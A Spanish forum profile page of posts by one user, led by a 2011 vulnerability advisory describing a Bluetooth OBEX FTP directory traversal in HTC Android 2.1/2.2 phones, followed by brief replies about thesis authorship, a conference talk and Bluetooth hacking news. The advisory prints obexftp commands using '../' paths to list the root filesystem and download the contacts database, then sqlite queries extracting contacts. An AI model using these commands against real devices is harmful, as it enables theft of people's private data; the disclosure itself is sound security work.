Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Gospel

#1
Aquí podéis encontrar el informe completo de la vulnerabilidad.

Title: HTC / Android OBEX FTP Service Directory Traversal

Author: Alberto Moreno Tablado

Vendor: HTC
Vulnerable  Products:

- HTC devices running Android 2.1

- HTC devices running Android 2.2

Summary

HTC devices running Android 2.1 and Android 2.2 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and read arbitrary files, via a ../ in a pathname.

Description

In the present HTC / Android phones include a Bluetooth stack, which provides Bluetooth communications with other remote devices. The File Transfer Profile (OBEX FTP) is one among all the Bluetooth services that may be implemented in the stack.

The OBEX FTP service is a software implementation of the File Transfer Profile (FTP). The File Transfer Profile (FTP) is intended for data exchange and it is based on the OBEX communications client-server protocol. The service is present in a large number of Bluetooth mobile phones. This service can be used for sending files from the phone to other remote devices and also allows remote devices to browse shared folders and download files from the phone.

In HTC / Android phones, the default directory of the OBEX FTP Server is the SDCard. Only files placed in the directory of the SDCard can be shared. The user cannot select other directory so sensitive files related to the operating system are not exposed.

There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Android 2.1 and Android 2.2. The OBEX FTP Server is a 3rd party driver developed by HTC and installed on HTC devices running Android operating system, so the vulnerability affects to this vendor specifically.

A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls over Linux to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks.

The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing up with the remote device should be enough to get it. However, more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and MAC address spoofing, can be used in order to avoid this. In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user.

Scope of the attack

The Directory Traversal vulnerability allows a remote attacker to browse folders located anywhere in the file system and download any file contained in any folder.

1) List arbitrary directories

Any directory within the file system of the phone can be browsed, beyond the limits of the default shared folder (the SDCard).

The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the path ../, the command retrieves the content of the parent of the default directory of the FTP server, this is the root directory of the disk file system:

gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -l "../"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 29ms
Receiving "../"... Sending ".."...|done
/<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
  <parent-folder/>
  <folder name="sqlite_stmt_journals"/>
  <folder name="config"/>
  <folder name="sdcard"/>
  <folder name="d"/>
  <folder name="etc"/>
  <folder name="cache"/>
  <folder name="system"/>
  <folder name="sys"/>
  <folder name="sbin"/>
  <folder name="proc"/>
  <file name="logo.rle" size="11336" user-perm="R" created="19700101T090000Z"/>
  <file name="init.rc" size="14664" user-perm="R" created="19700101T090000Z"/>
  <file name="init.goldfish.rc" size="1677" user-perm="R" created="19700101T090000Z"/>
  <file name="init.buzz.rc" size="3608" user-perm="R" created="19700101T090000Z"/>
  <file name="init" size="107668" user-perm="R" created="19700101T090000Z"/>
  <file name="default.prop" size="118" user-perm="R" created="19700101T090000Z"/>
  <folder name="data"/>
  <folder name="root"/>
  <folder name="dev"/>
</folder-listing>done
Disconnecting..-done


2) Read arbitrary files

Any file located in the file system can be downloaded. This may lead to access confidential data such as contacts, messages, emails or temporary internet files.

- Emails from Google account downloaded via GMAIL application, located in /data/data/com.google.android.providers.gmail/databases/mailstore.*****@gmail.com.db
- Contacts database, located in /data/data/com.android.providers.contacts/databases/contacts2.db.

The following example is the output of a command for downloading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the pathname ../data/data/com.android.providers.contacts/databases/contacts2.db, the command retrieves the contacts database:


gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -g "../data/data/com.android.providers.contacts/databases/contacts2.db"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 50ms
Receiving "../data/data/com.android.providers.contacts/databases/contacts2.db"... Sending ".."...|Sending "data".../Sending "data"...-Sending "com.android.providers.contacts"...\Sending "databases"...|done
/done
Disconnecting..-done


Once the database is downloaded, contacts can be queried with SQL:

gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.android.pcsc'"
08012341234
Philip J. Fry
pjfry@planex.com
...


Also contacts synced from Google and Facebook accounts can be queried from the same database:

gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.socialnetwork.facebook'"
*********
Aitana *******
Aitana *******
********@gmail.com
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/******_*********
*_*******_*.jpg
...


Affected products

- HTC devices running Android 2.1
- HTC devices running Android 2.2

The following products were tested and showed to be vulnerable: HTC Wildfire A3333, Softbank 001HT (HTC Desire HD), EMobile S31HT (HTC Aria).

Vendor status

This vulnerability is related to CVE-2009-0244, a vulnerability announced in 2009 affecting HTC devices running Windows Mobile 6 and Windows Mobile 6.1 and reported to HTC Europe. After the vulnerability was disclosed, HTC issued security hotfixes under the name <span style="font-style:italic;">Hotfix to enhance the security mechanism of Bluetooth service</span> for all the affected products. HTC reproduced the same security flaw in Android phones shipped throughout 2010 and 2011.

The current advisory was reported to HTC Japan in 2011/02. Subsequently, it was reported to HTC Europe in 2011/04 in order to obtain more feedback and re-attempt the collaboration. In both cases I failed to coordinate the disclosure of the advisory and release of the hotfix so finally I am forced to go public with all the information undisclosed.

The vulnerability is published as a zero-day threat. This means that all HTC devices running Android 2.1 and Android 2.2 shipped up to date July 2011 may be vulnerable and a security hotfix has not been issued by the manufacturer yet.

Users of HTC Android phones may expect to receive a notification for security update over-the-air regarding to this vulnerability, or find the latest updates in the support site.

Do not accept pairing nor connection requests from unknown sources. Delete old entries in the paired devices list.

HTC Wildfire, HTC Desire HD and HTC Aria are trademarks of HTC Corporation (HTC). Softbank 001HT is a trademark of SOFTBANK Corp. EMobile S31HT is a trademark of EMOBILE Ltd.
#2
Vaya, brujo. Pensaba regresar al foro por la puerta grande y hacerlo público yo mismo, pero te me has adelantado. :-)
#3
Hacking Mobile / Re: Gospel un manual
15 Enero 2010, 11:58 AM
Los derechos de mi proyecto de Fin de Carrera los tiene la Universidad Pontificia Comillas, no puedes fusilar la documentación y copiarla/modificarla/publicarla así por las buenas.

Tampoco entiendo por qué creas documentación redundante si ya tienes mi Proyecto de Fin de Carrera, eres libre para difundirlo y distribuirlo, pero no para alterarlo. Si quieres crear un documento en el que aportes nueva información y quieres citar partes (no integramente) de mi Proyecto de Fin de Carrera tienes que citar la fuente original como debe ser: Alberto Moreno Tablado, "Seguridad en Bluetooth", Universidad Pontificia Comillas, 2006. Por otro lado, si quieres poner mi nombre en un documento tienes que pedirme permiso antes, yo no he autorizado ser autor de este documento que publicas.

Copiar algo y poner tu nombre junto al del autor sin aportar nada nuevo es tener mucha cara.
#4
Gracias por el enlace T0rete. :)

La charla salió bien, hubo muchos asistentes. A pesar del efecto Demo, la práctica funcionó (a la segunda) y a la gente le gustó. Salí muy contento.
#5
¡Gracias a todos!

La vulnerabilidad afecta a todos los teléfonos HTC con Windows Mobile 6 y Windows Mobile 6.1 a excepción del HTC Touch Pro 2. Sólo afecta a los teléfonos HTC porque el fallo se encuentra en un driver desarrollado por HTC para el servicio OBEX FTP y que luego ha sido integrado en Windows Mobile.

Estaré en el Hackmeeting 2009 hablando sobre el fallo y haciendo algunas demos prácticas.

Saludos
#6
el-pollo: ¿Toda la información que aportas la has descubierto por ti mismo? ¿El video lo has grabado tú también?

¡Haz el favor de poner las fuentes de información en que te basas!
#7
1. No es un fake, los de f-secure han escrito un paper documentando el ataque y anunciando que su AV para móviles ya detecta el exploit (http://www.f-secure.com/weblog/archives/00001569.html)

2. ¿Cómo sabes que no va? ¿Lo has probado contra tu propio teléfono Nokia? Que huevos...
#8
Cita de: SirGraham en 27 Diciembre 2008, 10:49 AM
Aprovecho para Felicitaros a todos los miembros del foro el nuevo año....
O como diria Xenu (moderador de nuestro foro) la celebracion que realizais los mortales por dar una vuelta completa a vuestra estrella....

Este Xenu y su rollo cienciológico... xDDDD

¡FELIZ AÑO a ti también!
#9
Ah... pensé que sería eso por esto que leí...

http://seclists.org/fulldisclosure/2007/Jul/0602.html

Andrea is currently working on cracking open the very last
thing that holds him from crafting low level Bluetooth packets,
the XAP2 processor, he dissassembled the firmware to find out
how exactly it works, for that he wrote his own dissassembler,
after this he/we may write our own firmware
and basicaly do
whatever we like, for example code a full blown fuzzer or full
blown attack device.

Igual siguen en ello.
#10
Actualizado... :)